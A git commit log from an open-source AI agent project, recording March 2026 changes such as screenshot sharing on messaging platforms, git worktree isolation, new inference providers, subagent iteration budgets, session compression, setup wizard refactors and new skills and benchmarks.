2026-03-07 23:36:35 -08:00
Teknium
76545ab365 Merge pull request #657 from NousResearch/feat/browser-screenshot-sharing
feat: browser screenshot sharing via MEDIA: on all messaging platforms
2026-03-07 22:57:42 -08:00
teknium1
b8c3bc7841 feat: browser screenshot sharing via MEDIA: on all messaging platforms
browser_vision now saves screenshots persistently to ~/.hermes/browser_screenshots/
and returns the screenshot_path in its JSON response. The model can include
MEDIA:<path> in its response to share screenshots as native photos.

Changes:
- browser_tool.py: Save screenshots persistently, return screenshot_path,
  auto-cleanup files older than 24 hours, mkdir moved inside try/except
- telegram.py: Add send_image_file() — sends local images via bot.send_photo()
- discord.py: Add send_image_file() — sends local images via discord.File
- slack.py: Add send_image_file() — sends local images via files_upload_v2()
  (WhatsApp already had send_image_file — no changes needed)
- prompt_builder.py: Updated Telegram hint to list image extensions,
  added Discord and Slack MEDIA: platform hints
- browser.md: Document screenshot sharing and 24h cleanup
- send_file_integration_map.md: Updated to reflect send_image_file is now
  implemented on Telegram/Discord/Slack
- test_send_image_file.py: 19 tests covering MEDIA: .png extraction,
  send_image_file on all platforms, and screenshot cleanup

Partially addresses #466 (Phase 0: platform adapter gaps for send_image_file).
2026-03-07 22:57:05 -08:00
teknium1
a680367568 fix tmux menus 2026-03-07 22:14:21 -08:00
teknium1
dfd37a4b31 Merge PR #635: fix: add Kimi Code API support (api.kimi.com/coding/v1)
Authored by christomitov. Auto-detects sk-kimi- key prefix and routes
to api.kimi.com/coding/v1. Adds User-Agent header for Kimi Code API
compatibility. Legacy Moonshot keys continue to work unchanged.
2026-03-07 21:45:27 -08:00
teknium1
5ee9b67d9b Merge PR #654: feat: git worktree isolation for parallel CLI sessions (--worktree / -w)
Adds --worktree (-w) flag to hermes CLI for isolated git worktree sessions.
Multiple agents can work on the same repo concurrently without collisions.

Closes #652
2026-03-07 21:38:42 -08:00
teknium1
542faf225f Fix Telegram image delivery for large (>5MB) images
Telegram's send_photo via URL has a ~5MB limit. Upscaled images from
fal.ai's Clarity Upscaler often exceed this, causing 'Wrong type of
web page content' or 'Failed to get http url content' errors.

Fix: Add download-and-upload fallback in Telegram's send_image().
When URL-based send_photo fails, download the image via httpx and
re-upload as bytes (supports up to 10MB file uploads).

Also: convert print() to logger.warning/error in image sending path
for proper log visibility (print goes to socket, invisible in logs).
2026-03-07 21:29:45 -08:00
teknium1
5684c68121 Add logger.info/error for image extraction and delivery debugging 2026-03-07 21:24:47 -08:00
teknium1
4be783446a fix: wire worktree flag into hermes CLI entry point + docs + tests
Critical fixes:
- Add --worktree/-w to hermes_cli/main.py argparse (both chat
  subcommand and top-level parser) so 'hermes -w' works via the
  actual CLI entry point, not just 'python cli.py -w'
- Pass worktree flag through cmd_chat() kwargs to cli_main()
- Handle worktree attr in bare 'hermes' and --resume/--continue paths

Bug fixes in cli.py:
- Skip worktree creation for --list-tools/--list-toolsets (wasteful)
- Wrap git worktree subprocess.run in try/except (crash on timeout)
- Add stale worktree pruning on startup (_prune_stale_worktrees):
  removes clean worktrees older than 24h left by crashed/killed sessions

Documentation updates:
- AGENTS.md: add --worktree to CLI commands table
- cli-config.yaml.example: add worktree config section
- website/docs/reference/cli-commands.md: add to core commands
- website/docs/user-guide/cli.md: add usage examples
- website/docs/user-guide/configuration.md: add config docs

Test improvements (17 → 31 tests):
- Stale worktree pruning (prune old clean, keep recent, keep dirty)
- Directory symlink via .worktreeinclude
- Edge cases (no commits, not a repo, pre-existing .worktrees/)
- CLI flag/config OR logic
- TERMINAL_CWD integration
- System prompt injection format
2026-03-07 21:05:40 -08:00
teknium1
8d719b180a feat: git worktree isolation for parallel CLI sessions (--worktree / -w)
Add a --worktree (-w) flag to the hermes CLI that creates an isolated
git worktree for the session. This allows running multiple hermes-agent
instances concurrently on the same repo without file collisions.

How it works:
- On startup with -w: detects git repo, creates .worktrees/<session>/
  with its own branch (hermes/<session-id>), sets TERMINAL_CWD to it
- Each agent works in complete isolation — independent HEAD, index,
  and working tree, shared git object store
- On exit: auto-removes worktree and branch if clean, warns and
  keeps if there are uncommitted changes
- .worktreeinclude file support: list gitignored files (.env, .venv/)
  to auto-copy/symlink into new worktrees
- .worktrees/ is auto-added to .gitignore
- Agent gets a system prompt note about the worktree context
- Config support: set worktree: true in config.yaml to always enable

Usage:
  hermes -w                      # Interactive mode in worktree
  hermes -w -q "Fix issue #123"  # Single query in worktree
  # Or in config.yaml:
  worktree: true

Includes 17 tests covering: repo detection, worktree creation,
independence verification, cleanup (clean/dirty), .worktreeinclude,
.gitignore management, and 10 concurrent worktrees.

Closes #652
2026-03-07 20:51:08 -08:00
teknium1
bf048c8aec feat: add qmd optional skill — local knowledge base search
Add official optional skill for qmd (tobi/qmd), a local on-device
search engine for personal knowledge bases, notes, docs, and meeting
transcripts.

Covers:
- Installation and setup for macOS and Linux
- Collection management and context annotations
- All search modes: BM25, vector, hybrid with reranking
- MCP integration (stdio and HTTP daemon modes)
- Structured query patterns and best practices
- systemd/launchd service configs for daemon persistence

Placed in optional-skills/ due to heavyweight requirements
(Node >= 22, ~2GB local models).
2026-03-07 20:39:05 -08:00
teknium1
c5a9d1ef9d Merge branch 'main' into pr-635 2026-03-07 20:36:42 -08:00
teknium1
c7b6f423c7 feat: auto-compress pathologically large gateway sessions (#628)
Long-lived gateway sessions can accumulate enough history that every new
message rehydrates an oversized transcript, causing repeated truncation
failures (finish_reason=length).

Add a session hygiene check in _handle_message that runs right after
loading the transcript and before invoking the agent:

1. Estimate message count and rough token count of the transcript
2. If above configurable thresholds (default: 200 msgs or 100K tokens),
   auto-compress the transcript proactively
3. Notify the user about the compression with before/after stats
4. If still above warn threshold (default: 200K tokens) after
   compression, suggest /reset
5. If compression fails on a dangerously large session, warn the user
   to use /compress or /reset manually

Thresholds are configurable via config.yaml:

  session_hygiene:
    auto_compress_tokens: 100000
    auto_compress_messages: 200
    warn_tokens: 200000

This complements the agent's existing preflight compression (which
runs inside run_conversation) by catching pathological sessions at
the gateway layer before the agent is even created.

Includes 12 tests for threshold detection and token estimation.
2026-03-07 20:09:48 -08:00
teknium1
6d34207167 Merge PR #620: fix: restore missing MIT license file
Authored by stablegenius49. Fixes #619.
2026-03-07 20:00:33 -08:00
Bryan Young
fcde9be10d fix: keep tool-call output runs intact during compression 2026-03-08 03:13:14 +00:00
teknium1
3830bbda41 fix: include url in web_extract trimmed results & fix docs
The web_extract_tool was stripping the 'url' key during its output
trimming step, but documentation in 3 places claimed it was present.
This caused KeyError when accessing result['url'] in execute_code
scripts, especially when extracting from multiple URLs.

Changes:
- web_tools.py: Add 'url' back to trimmed_results output
- code_execution_tool.py: Add 'title' to _TOOL_STUBS docstring and
  _TOOL_DOC_LINES so docs match actual {url, title, content, error}
  response format
2026-03-07 18:07:36 -08:00
Christo Mitov
4447e7d71a fix: add Kimi Code API support (api.kimi.com/coding/v1)
Kimi Code (platform.kimi.ai) issues API keys prefixed sk-kimi- that require:
1. A different base URL: api.kimi.com/coding/v1 (not api.moonshot.ai/v1)
2. A User-Agent header identifying a recognized coding agent

Without this fix, sk-kimi- keys fail with 401 (wrong endpoint) or 403
('only available for Coding Agents') errors.

Changes:
- Auto-detect sk-kimi- key prefix and route to api.kimi.com/coding/v1
- Send User-Agent: KimiCLI/1.0 header for Kimi Code endpoints
- Legacy Moonshot keys (api.moonshot.ai) continue to work unchanged
- KIMI_BASE_URL env var override still takes priority over auto-detection
- Updated .env.example with correct docs and all endpoint options
- Fixed doctor.py health check for Kimi Code keys

Reference: https://github.com/MoonshotAI/kimi-cli (platforms.py)
2026-03-07 21:00:12 -05:00
teknium1
7bccd904c7 Merge PR #629: feat: add Polymarket prediction market skill (read-only)
Adds market-data/polymarket skill — read-only access to Polymarket's public
prediction market APIs. Zero dependencies, zero auth required.
Addresses #589.
2026-03-07 17:28:03 -08:00
teknium1
313d522b61 feat: add Polymarket prediction market skill (read-only)
Adds a new market-data/polymarket skill for querying Polymarket's public
prediction market APIs. Pure read-only, zero authentication required,
zero external dependencies (stdlib only).

Includes:
- SKILL.md: Agent instructions with key concepts and workflow
- references/api-endpoints.md: Full API reference (Gamma, CLOB, Data APIs)
- scripts/polymarket.py: CLI helper for search, trending, prices, orderbooks,
  price history, and recent trades

Addresses #589.
2026-03-07 17:27:29 -08:00
teknium1
9ee4fe41fe Fix image_generate 'Event loop is closed' in gateway
Root cause: fal_client.AsyncClient uses @cached_property for its
httpx.AsyncClient, creating it once and caching forever. In the gateway,
the agent runs in a thread pool where _run_async() calls asyncio.run()
which creates a temporary event loop. The first call works, but
asyncio.run() closes that loop. On the next call, a new loop is created
but the cached httpx.AsyncClient still references the old closed loop,
causing 'Event loop is closed'.

Fix: Switch from async fal_client API (submit_async/handler.get with
await) to sync API (submit/handler.get). The sync API uses httpx.Client
which has no event loop dependency. Since the tool already runs in a
thread pool via the gateway, async adds no benefit here.

Changes:
- image_generate_tool: async def -> def
- _upscale_image: async def -> def
- fal_client.submit_async -> fal_client.submit
- await handler.get() -> handler.get()
- is_async=True -> is_async=False in registry
- Remove unused asyncio import
2026-03-07 16:56:49 -08:00
teknium1
39ee3512cb Merge PR #614: fix: resolve systemd restart loop with --replace flag
Authored by voidborne-d. Fixes #576.

Adds --replace flag to 'hermes gateway run' that terminates any existing
gateway instance (SIGTERM with SIGKILL fallback) before starting.
Updated systemd unit template with --replace, ExecStop, KillMode, and
TimeoutStopSec for robust service management.
2026-03-07 16:33:27 -08:00
teknium1
42673556af Merge PR #575: fix(setup): prevent OpenRouter model list fallback for Nous provider
Authored by PercyDikec. Fixes #574.

# Conflicts:
#	hermes_cli/setup.py
2026-03-07 16:22:13 -08:00
teknium1
faab73ad58 Merge PR #573: fix(doctor): detect OpenAI custom endpoint env settings
Authored by stablegenius49. Fixes #572.
2026-03-07 16:16:08 -08:00
teknium1
7e36468511 fix: /clear command broken inside TUI (patch_stdout interference)
The /clear command was using Rich's console.clear() and console.print()
which write directly to stdout. Inside the TUI, prompt_toolkit's
patch_stdout intercepts stdout via StdoutProxy, which doesn't interpret
screen-clearing escape sequences and mangles Rich's ANSI output,
resulting in raw escape codes dumped to the terminal.

Fix:
- Use prompt_toolkit's output.erase_screen() + cursor_goto() to clear
  the terminal directly (bypasses patch_stdout's StdoutProxy)
- Render the banner through ChatConsole (which routes Rich output
  through prompt_toolkit's native print_formatted_text/ANSI renderer)
- Use _cprint for the status message (prompt_toolkit-compatible)
- Fall back to the old behavior when not inside the TUI (e.g. startup)
2026-03-07 16:09:23 -08:00
stablegenius49
9ba5d399e5 fix: restore missing MIT license file 2026-03-07 13:43:08 -08:00
teknium1
306d92a9d7 refactor(context_compressor): improve summary generation logic and error handling
Updated the _generate_summary method to attempt summary generation using the auxiliary model first, with a fallback to the main model. If both attempts fail, the method now returns None instead of a placeholder, allowing the caller to handle missing summaries appropriately. This change enhances the robustness of context compression and improves logging for failure scenarios.
2026-03-07 11:54:51 -08:00
teknium1
5baae0df88 feat(scheduler): enhance job configuration with reasoning effort, prefill messages, and provider routing
Added support for loading reasoning configuration, prefill messages, and provider routing from environment variables or config.yaml in the run_job function. This improves flexibility and customization for job execution, allowing for better control over agent behavior and message handling.
2026-03-07 11:37:16 -08:00
teknium1
24f6a193e7 fix: remove stale 'model' assertion from delegate_task schema test
The 'model' property was removed from DELEGATE_TASK_SCHEMA but the
test still asserted its presence, causing CI to fail.
2026-03-07 11:29:55 -08:00
teknium1
8c0f8baf32 feat(delegate_tool): add additional parameters for child agent configuration
Enhanced the _run_single_child function by introducing max_tokens, reasoning_config, and prefill_messages parameters from the parent agent. This allows for more flexible configuration of child agents, improving their operational capabilities.
2026-03-07 11:29:17 -08:00
teknium1
d80c30cc92 feat(gateway): proactive async memory flush on session expiry
Previously, when a session expired (idle/daily reset), the memory flush
ran synchronously inside get_or_create_session — blocking the user's
message for 10-60s while an LLM call saved memories.

Now a background watcher task (_session_expiry_watcher) runs every 5 min,
detects expired sessions, and flushes memories proactively in a thread
pool.  By the time the user sends their next message, memories are
already saved and the response is immediate.

Changes:
- Add _is_session_expired(entry) to SessionStore — works from entry
  alone without needing a SessionSource
- Add _pre_flushed_sessions set to track already-flushed sessions
- Remove sync _on_auto_reset callback from get_or_create_session
- Refactor flush into _flush_memories_for_session (sync worker) +
  _async_flush_memories (thread pool wrapper)
- Add _session_expiry_watcher background task, started in start()
- Simplify /reset command to use shared fire-and-forget flush
- Add 10 tests for expiry detection, callback removal, tracking
2026-03-07 11:27:50 -08:00
teknium1
e64d646bad Critical: fix bug in new subagent tool call budget to not be session-level but tool call loop level 2026-03-07 10:32:51 -08:00
teknium1
b84f9e410c feat: default reasoning effort from xhigh to medium
Reduces token usage and latency for most tasks by defaulting to
medium reasoning effort instead of xhigh. Users can still override
via config or CLI flag. Updates code, tests, example config, and docs.
2026-03-07 10:14:19 -08:00
d 🔹
ee5daba061 fix: resolve systemd restart loop with --replace flag (#576)
When running under systemd, the gateway could enter restart loops in two
scenarios:

1. The previous gateway process hasn't fully exited when systemd starts
   a new one, causing 'Gateway already running (PID ...)' → exit 1 →
   restart → same error → infinite loop.

2. The interactive CLI exits immediately in non-TTY mode, and systemd
   keeps restarting it.

Changes:

- Add --replace flag to 'hermes gateway run' that gracefully kills any
  existing gateway instance (SIGTERM → wait 10s → SIGKILL) before
  starting, preventing the PID-lock deadlock.

- Update the generated systemd unit template to use --replace by default,
  add ExecStop for clean shutdown, set KillMode=mixed and
  TimeoutStopSec=15 for proper process management.

- Existing behavior (without --replace) is unchanged: still prints the
  error message and exits, now also mentioning the --replace option.

Fixes #576
2026-03-07 18:08:12 +00:00
teknium1
23e84de830 refactor: remove model parameter from AIAgent initialization
Eliminated the model parameter from the AIAgent class initialization, streamlining the constructor and ensuring consistent behavior across agent instances. This change aligns with recent updates to the task delegation logic.
2026-03-07 09:48:19 -08:00
teknium1
48e0dc8791 feat: implement Z.AI endpoint detection for API key validation
Added functionality to detect the appropriate Z.AI endpoint based on the provided API key, accommodating different billing plans and regions. The setup process now probes available endpoints and updates the configuration accordingly, enhancing user experience and reducing potential billing errors. Updated the setup model provider function to integrate this new detection logic.
2026-03-07 09:43:37 -08:00
teknium1
fb0f579b16 refactor: remove model parameter from delegate_task function
Eliminated the model parameter from the delegate_task function and its associated schema, defaulting to None for subagent calls. This change simplifies the function signature and enforces consistent behavior across task delegation.
2026-03-07 09:20:27 -08:00
teknium1
5a711f32b1 fix: enhance payload and context compression handling
Added logic to manage multiple compression attempts for large payloads and context length errors. Introduced limits on compression attempts to prevent infinite retries, with appropriate logging and error handling. This ensures better resilience and user feedback when facing compression issues during API calls.
2026-03-07 09:19:07 -08:00
teknium1
4d34427cc7 fix: update model version in agent configurations
Updated the default model version from "anthropic/claude-sonnet-4-20250514" to "anthropic/claude-sonnet-4.6" across multiple files including AGENTS.md, batch_runner.py, mini_swe_runner.py, and run_agent.py for consistency and to reflect the latest model improvements.
2026-03-07 09:06:37 -08:00
teknium1
41877183bc Merge PR #604: fix(tests): isolate max_turns tests from CI env and update default to 90
Authored by 0xbyt4. Fixes test assertions broken by 0a82396 (60→90 default).
2026-03-07 08:57:36 -08:00
0xbyt4
451a007fb1 fix(tests): isolate max_turns tests from CI env and update default to 90
_make_cli() did not clear HERMES_MAX_ITERATIONS env var, so tests
failed in CI where the var was set externally. Also, default max_turns
changed from 60 to 90 in 0a82396 but tests were not updated.

- Clear HERMES_MAX_ITERATIONS in _make_cli() for proper isolation
- Add env_overrides parameter for tests that need specific env values
- Update hardcoded 60 assertions to 90 to match new default
- Simplify test_env_var_max_turns using env_overrides
2026-03-07 19:43:20 +03:00
teknium1
0a82396718 feat: shared iteration budget across parent + subagents
Subagent tool calls now count toward the same session-wide iteration
limit as the parent agent. Previously, each subagent had its own
independent counter, so a parent with max_iterations=60 could spawn
3 subagents each doing 50 calls = 150 total tool calls unmetered.

Changes:
- IterationBudget: thread-safe shared counter (run_agent.py)
  - consume(): try to use one iteration, returns False if exhausted
  - refund(): give back one iteration (for execute_code turns)
  - Thread-safe via Lock (subagents run in ThreadPoolExecutor)
- Parent creates the budget, children inherit it via delegate_tool.py
- execute_code turns are refunded (don't count against budget)
- Default raised from 60 → 90 to account for shared consumption
- Per-child cap (50) still applies as a safety valve

The per-child max_iterations (default 50) remains as a per-child
ceiling, but the shared budget is the hard session-wide limit.
A child stops at whichever comes first.
2026-03-07 08:16:37 -08:00
teknium1
5da55ea1e3 fix: sanitize orphaned tool-call/result pairs in message compression
Enhance message compression by adding a method to clean up orphaned tool-call and tool-result pairs. This ensures that the API receives well-formed messages, preventing errors related to mismatched IDs. The new functionality includes removing orphaned results and adding stub results for missing calls, improving overall message integrity during compression.
2026-03-07 08:08:00 -08:00
teknium1
064c009deb feat: show update-available notice in CLI banner
Check how many commits behind origin/main the local repo is and
display a warning in the welcome banner:

  ⚠ 12 commits behind — run hermes update to update

- git fetch cached for 6 hours (avoids repeated network calls)
- Falls back gracefully if offline or not a git repo
- Never breaks the banner — all errors silently caught
2026-03-07 07:35:36 -08:00
teknium1
caab1cf453 fix: update setup/config UI for local browser mode
- tools_config.py: Add 'Local Browser' as first provider option
  (no API keys needed, same npm install for agent-browser)
- setup.py: Show 'Browser Automation (local)' when agent-browser
  CLI is found but no Browserbase key is set
- config.py: Mark BROWSERBASE_* descriptions as optional
- status.py: Note that local browser works without Browserbase
2026-03-07 01:23:27 -08:00
teknium1
55c70f3508 fix: strip MarkdownV2 escapes from Telegram plaintext fallback
When Telegram's MarkdownV2 parser rejects a message, the send() fallback
was sending the already-escaped text as plain text. This caused users to
see raw backslashes before every special character (periods, dashes,
parentheses, etc.) — e.g. 'sentence\.' or '\-\-auto\-approve'.

Changes:
- Add _strip_mdv2() to reverse MarkdownV2 escaping for clean plaintext
- Use stripped text in the send() fallback path instead of raw escaped chunk
- Add logging when the MDV2 fallback is triggered for diagnostics
- Add logger to telegram.py (was missing)

The edit_message() fallback already correctly used the original content;
this brings send() in line with that behavior.
2026-03-07 01:23:18 -08:00
teknium1
d29249b8fa feat: local browser backend — zero-cost headless Chromium via agent-browser
Add local browser mode as an automatic fallback when Browserbase
credentials are not configured. Uses the same agent-browser CLI with
--session (local Chromium) instead of --cdp (cloud Browserbase).

The agent-facing API is completely unchanged — all 10 browser_* tools
produce identical output in both modes. Auto-detection:
  - BROWSERBASE_API_KEY set → cloud mode (existing behavior)
  - No key → local mode (new, free, headless Chromium)

Changes:
- _is_local_mode(): auto-detect based on env vars
- _create_local_session(): lightweight session (no API call)
- _get_session_info(): branches on local vs cloud
- _run_browser_command(): --session in local, --cdp in cloud
- check_browser_requirements(): only needs agent-browser CLI in local mode
- _emergency_cleanup: CLI close in local, API release in cloud
- cleanup_browser/browser_close: skip BB API calls in local mode
- Registry: removed requires_env — check_fn handles both modes

Setup for local mode:
  npm install -g agent-browser
  agent-browser install              # downloads Chromium
  agent-browser install --with-deps  # also installs system libs (Docker/Debian)

Closes #374 (Phase 1)
2026-03-07 01:14:57 -08:00
teknium1
f668e9fc75 feat: platform-conditional skill loading + Apple/macOS skills
Add a 'platforms' field to SKILL.md frontmatter that restricts skills
to specific operating systems. Skills with platforms: [macos] only
appear in the system prompt, skills_list(), and slash commands on macOS.
Skills without the field load everywhere (backward compatible).

Implementation:
- skill_matches_platform() in tools/skills_tool.py — core filter
- Wired into all 3 discovery paths: prompt_builder.py, skills_tool.py,
  skill_commands.py
- 28 new tests across 3 test files

New bundled Apple/macOS skills (all platforms: [macos]):
- imessage — Send/receive iMessages via imsg CLI
- apple-reminders — Manage Reminders via remindctl CLI
- apple-notes — Manage Notes via memo CLI
- findmy — Track devices/AirTags via AppleScript + screen capture

Docs updated: CONTRIBUTING.md, AGENTS.md, creating-skills.md,
skills.md (user guide)
2026-03-07 00:47:54 -08:00
teknium1
74fe1e2254 chore: remove TODO.md — all items tracked as issues
All remaining TODO items have covering issues:
- Local Browser via CDP: #374, #493
- Signal Integration: #405
- Plugin/Extension System: #359
- MCP Client Improvements: #581 (new)
- Filesystem Checkpointing: #452

Completed items (MCP core support) already shipped in PR #301.
2026-03-07 00:07:14 -08:00
teknium1
348936752a fix: simplify timezone migration to use os.getenv directly
The previous 'get_env_value' in dir() check always evaluated to False
(dir() returns local scope, not module scope), making the left branch
dead code. Simplified to just os.getenv() which was the fallback anyway.
2026-03-07 00:05:05 -08:00
teknium1
69a36a3361 Merge PR #309: fix(timezone): timezone-aware now() for prompt, cron, and execute_code
Authored by areu01or00. Adds timezone support via hermes_time.now() helper
with IANA timezone resolution (HERMES_TIMEZONE env → config.yaml → server-local).
Updates system prompt timestamp, cron scheduling, and execute_code sandbox TZ
injection. Includes config migration (v4→v5) and comprehensive test coverage.
2026-03-07 00:04:41 -08:00
Teknium
8712dd6d1c Merge pull request #308 from batuhankocyigit/patch-2
fix: rename misspelled directory 'fouth-edition' to 'fourth-edition'
2026-03-06 23:43:09 -08:00
teknium1
55a21fe37b docs: add Environments, Benchmarks & Data Generation guide
Comprehensive developer guide covering:
- Architecture (BaseEnv → HermesAgentBaseEnv → concrete envs)
- All three benchmarks (TerminalBench2, TBLite, YC-Bench)
- Training environments (TerminalTestEnv, HermesSweEnv)
- Core components (AgentLoop, ToolContext, Tool Call Parsers)
- Two-phase operation (Phase 1 OpenAI, Phase 2 VLLM)
- Running environments (evaluate, process, serve modes)
- Creating new environments (training + eval-only)
- Configuration reference and prerequisites

Also updates environments/README.md directory tree to include
TBLite and YC-Bench benchmarks.
2026-03-06 23:31:45 -08:00
teknium1
f55f625277 chore: reorder terminal backends in setup wizard
Local, Docker, Modal, SSH, Daytona, Singularity (Linux-only, last).
2026-03-06 22:21:57 -08:00
teknium1
9dac85b069 fix: uv pip install fails outside venv in setup wizard
uv pip install requires a virtual environment by default. When hermes
is installed system-wide or via pipx, the setup wizard's SDK installs
(daytona, swe-rex[modal], tinker-atropos) fail with 'No virtual
environment found'. Fix by passing --python sys.executable to uv,
which targets the correct Python regardless of venv state.

Also show the actual error message on install failure so users can
debug.
2026-03-06 21:55:33 -08:00
teknium1
99bd69baa8 Merge feat/modular-setup-wizard: modular setup wizard with section subcommands and tool-first UX
- 5 standalone sections: hermes setup [model|terminal|gateway|tools|agent]
- Returning user menu with section shortcuts
- Tool-first UX: category -> provider -> API key flow
- Unified hermes tools / hermes setup tools
- Fixed dict-format model config display bug

Closes #567
2026-03-06 21:12:30 -08:00
teknium1
a62a137a4f fix: handle dict-format model config in setup wizard display
config['model'] can be a dict (old format: {default, base_url, provider})
or a string (new format). The setup wizard was showing the raw dict in
'Keep current' and 'Model set to' messages. Now extracts the model name
from either format.
2026-03-06 21:11:40 -08:00
teknium1
82b18e8ac2 feat: unify hermes tools and hermes setup tools into single flow
Both 'hermes tools' and 'hermes setup tools' now use the same unified
flow in tools_config.py:

1. Select platform (CLI, Telegram, Discord, etc.)
2. Toggle all 18 toolsets on/off in checklist
3. Newly enabled tools that need API keys → provider-aware config
   (e.g., TTS shows Edge/OpenAI/ElevenLabs picker)
4. Already-configured tools that stay enabled → silent, no prompts
5. Menu option: 'Reconfigure an existing tool' for updating
   providers or API keys on tools that are already set up

Key changes:
- Move TOOL_CATEGORIES, provider config, and post-setup hooks from
  setup.py to tools_config.py
- Replace flat _check_and_prompt_requirements() with provider-aware
  _configure_toolset() that uses TOOL_CATEGORIES
- Add _reconfigure_tool() flow for updating existing configs
- setup.py's setup_tools() now delegates to tools_command()
- tools_command() menu adds 'Reconfigure' option alongside platforms
- Only prompt for API keys on tools that are NEWLY toggled on AND
  don't already have keys configured

No breaking changes. All 2013 tests pass.
2026-03-06 21:02:00 -08:00
teknium1
0111c9848d fix: remove ANSI codes and em dashes from menu labels
simple_term_menu miscalculates string widths when labels contain
ANSI escape codes (from color()) or em dashes, causing duplicated
and garbled lines on arrow key navigation.

Replace color() status indicators with plain text [configured]/[active]
and em dashes with regular dashes in all prompt_choice/prompt_checklist
labels.
2026-03-06 21:02:00 -08:00
teknium1
ab9cadfeee feat: modular setup wizard with section subcommands and tool-first UX
Restructure the monolithic hermes setup wizard into independently-runnable
sections with a category-first tool configuration experience.

Changes:
- Break setup into 5 sections: model, terminal, gateway, tools, agent
- Each section is a standalone function, runnable individually via
  'hermes setup model', 'hermes setup terminal', etc.
- Returning users get a menu: Quick Setup / Full Setup / individual sections
- First-time users get a guided walkthrough of all sections

Tool Configuration UX overhaul:
- Replace flat API key checklist with category-first approach
- Show tool types (TTS, Web Search, Image Gen, etc.) as top-level items
- Within each category, let users pick a provider:
  - TTS: Microsoft Edge (Free), OpenAI, ElevenLabs
  - Web: Firecrawl Cloud, Firecrawl Self-Hosted
  - Image Gen: FAL.ai
  - Browser: Browserbase
  - Smart Home: Home Assistant
  - RL Training: Tinker/Atropos
  - GitHub: Personal Access Token
- Shows configured status on each tool and provider
- Only prompts for API keys after provider selection

Also:
- Add section argument to setup argparse parser in main.py
- Update summary to show new section commands
- Add self-hosted Firecrawl and Home Assistant to tool setup
- All 2013 tests pass
2026-03-06 21:02:00 -08:00
PercyDikec
8bf28e1441 fix(setup): prevent OpenRouter model list fallback for Nous provider
When `fetch_nous_models()` fails silently during setup, the model
selection falls through to the OpenRouter static list. Users then pick
models in OpenRouter format (e.g. `anthropic/claude-opus-4.6`) which
the Nous inference API rejects with a 400 "missing model" error.

Add an explicit `elif selected_provider == "nous"` branch that prompts
for manual model entry instead of falling through to the generic
OpenRouter fallback.
2026-03-07 07:16:22 +03:00
teknium1
ce28f847ce fix: update OpenRouter model names for yc-bench config
Use anthropic/claude-sonnet-4.6 (OpenRouter format) instead of
anthropic/claude-sonnet-4-20250514 (direct API format).
2026-03-06 19:58:56 -08:00
stablegenius49
5609117882 fix(doctor): recognize OPENAI_API_KEY custom endpoint config 2026-03-06 19:47:09 -08:00
teknium1
b4fbb6fe10 feat: add YC-Bench long-horizon agent benchmark environment
Adds eval-only benchmark for YC-Bench (collinear-ai/yc-bench), a
deterministic long-horizon benchmark where the agent acts as CEO of an
AI startup over a simulated 1-3 year run.

Key design decisions verified against the official yc-bench repo:
- Uses 'sim init' (NOT 'yc-bench run') to avoid starting a competing
  built-in agent loop
- Correct DB table names: 'companies' and 'sim_events'
- Correct 4 domains: research, inference, data_environment, training
- Penalty values are preset-dependent (not hardcoded in system prompt)
- Sequential evaluation (each run is 100-500 turns)
- Follows TerminalBench2 patterns: KeyboardInterrupt handling,
  cleanup_all_environments(), tqdm logging handler, streaming JSONL

yc-bench added as optional dependency: pip install hermes-agent[yc-bench]

Closes #340
2026-03-06 19:25:56 -08:00
teknium1
82d7e9429e chore: add GLM/Kimi/MiniMax models to insights pricing (zero cost)
These direct providers don't return cost in API responses and their
per-token pricing isn't readily available externally. Treat as local
models with zero cost so they appear in /insights without fake estimates.
2026-03-06 19:12:14 -08:00
teknium1
e2821effb5 feat: add direct API-key providers as auxiliary client fallbacks
When the user only has a z.ai/Kimi/MiniMax API key (no OpenRouter key),
auxiliary tasks (context compression, web summarization, session search)
now fall back to the configured direct provider instead of returning None.

Resolution chain: OpenRouter -> Nous -> Custom endpoint -> Codex OAuth
-> direct API-key providers -> None.

Uses cheap/fast models for auxiliary tasks:
- zai: glm-4.5-flash
- kimi-coding: kimi-k2-turbo-preview
- minimax/minimax-cn: MiniMax-M2.5-highspeed

Vision auxiliary intentionally NOT modified — vision needs multimodal
models (Gemini) that these providers don't serve.
2026-03-06 19:08:54 -08:00
teknium1
9742f11fda chore: add context lengths for Kimi and MiniMax models
Adds DEFAULT_CONTEXT_LENGTHS entries for kimi-k2.5 (262144), kimi-k2-thinking
(262144), kimi-k2-turbo-preview (262144), kimi-k2-0905-preview (131072),
MiniMax-M2.5/M2.5-highspeed/M2.1 (204800), and glm-4.5/4.5-flash (131072).

Avoids unnecessary 2M-token probe on first use with direct providers.
2026-03-06 19:01:38 -08:00
Tyler
53b4b7651a Add official OpenClaw migration skill for Hermes Agent
Introduces a new OpenClaw-to-Hermes migration skill with a Python
helper script that handles importing SOUL.md, memories, user profiles,
messaging settings, command allowlists, skills, TTS assets, and
workspace instructions.

Supports two migration presets (user-data / full), three skill conflict
modes (skip / overwrite / rename), overflow file export for entries that
exceed character limits, and granular include/exclude option filtering.

Includes detailed SKILL.md agent instructions covering the clarify-tool
interaction protocol, decision-to-command mapping, post-run reporting
rules, and path resolution guidance.

Adds dynamic panel width calculation to CLI clarify/approval widgets so
panels adapt to content and terminal size.

Includes 7 new tests covering presets, include/exclude, conflict modes,
overflow exports, and skills_guard integration.
2026-03-06 18:57:12 -08:00
teknium1
388dd4789c feat: add z.ai/GLM, Kimi/Moonshot, MiniMax as first-class providers
Adds 4 new direct API-key providers (zai, kimi-coding, minimax, minimax-cn)
to the inference provider system. All use standard OpenAI-compatible
chat/completions endpoints with Bearer token auth.

Core changes:
- auth.py: Extended ProviderConfig with api_key_env_vars and base_url_env_var
  fields. Added providers to PROVIDER_REGISTRY. Added provider aliases
  (glm, z-ai, zhipu, kimi, moonshot). Added auto-detection of API-key
  providers in resolve_provider(). Added resolve_api_key_provider_credentials()
  and get_api_key_provider_status() helpers.
- runtime_provider.py: Added generic API-key provider branch in
  resolve_runtime_provider() — any provider with auth_type='api_key'
  is automatically handled.
- main.py: Added providers to hermes model menu with generic
  _model_flow_api_key_provider() flow. Updated _has_any_provider_configured()
  to check all provider env vars. Updated argparse --provider choices.
- setup.py: Added providers to setup wizard with API key prompts and
  curated model lists.
- config.py: Added env vars (GLM_API_KEY, KIMI_API_KEY, MINIMAX_API_KEY,
  etc.) to OPTIONAL_ENV_VARS.
- status.py: Added API key display and provider status section.
- doctor.py: Added connectivity checks for each provider endpoint.
- cli.py: Updated provider docstrings.

Docs: Updated README.md, .env.example, cli-config.yaml.example,
cli-commands.md, environment-variables.md, configuration.md.

